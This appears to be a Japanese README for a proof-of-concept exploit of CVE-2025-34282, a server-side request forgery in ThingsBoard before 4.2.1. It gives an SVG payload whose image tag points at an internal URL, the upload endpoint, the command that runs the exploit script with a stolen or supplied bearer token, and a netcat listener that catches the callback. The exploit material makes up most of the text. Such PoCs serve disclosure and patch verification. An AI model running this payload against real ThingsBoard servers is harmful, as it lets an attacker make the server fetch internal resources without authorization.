
CVE-2025-34282 用 PoC エクスプロイト - SVG 画像アップロード経由の ThingsBoard SSRF
| 項目 | 詳細 |
|---|
| CVE | CVE-2025-34282 |
| 影響を受けるバージョン | < 4.2.1 |
| 修正バージョン | 4.2.1 |
| CVSSスコア | 6.9 中 |
| CWE | CWE-918 (サーバーサイドリクエストフォージェリ) |
| ベンダー | https://thingsboard.io |
POST /api/imageにアップロードする
publicLinkを<object>タグ経由で埋め込むカスタムウィジェットが作成される
ssrf_localhost_5555.svg ペイロードは、内部URL参照を埋め込んでいます:
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />
アップロードされると、ThingsBoardのサーバーはhttp://127.0.0.1:5555をフェッチし、SSRFを確認します。
必要条件:
pip install requests
実行:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>
例:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...
エクスプロイトを実行する前に、SSRF コールバックをキャッチするリスナーを起動してください:
nc -l 5555
Tamil Mathi T.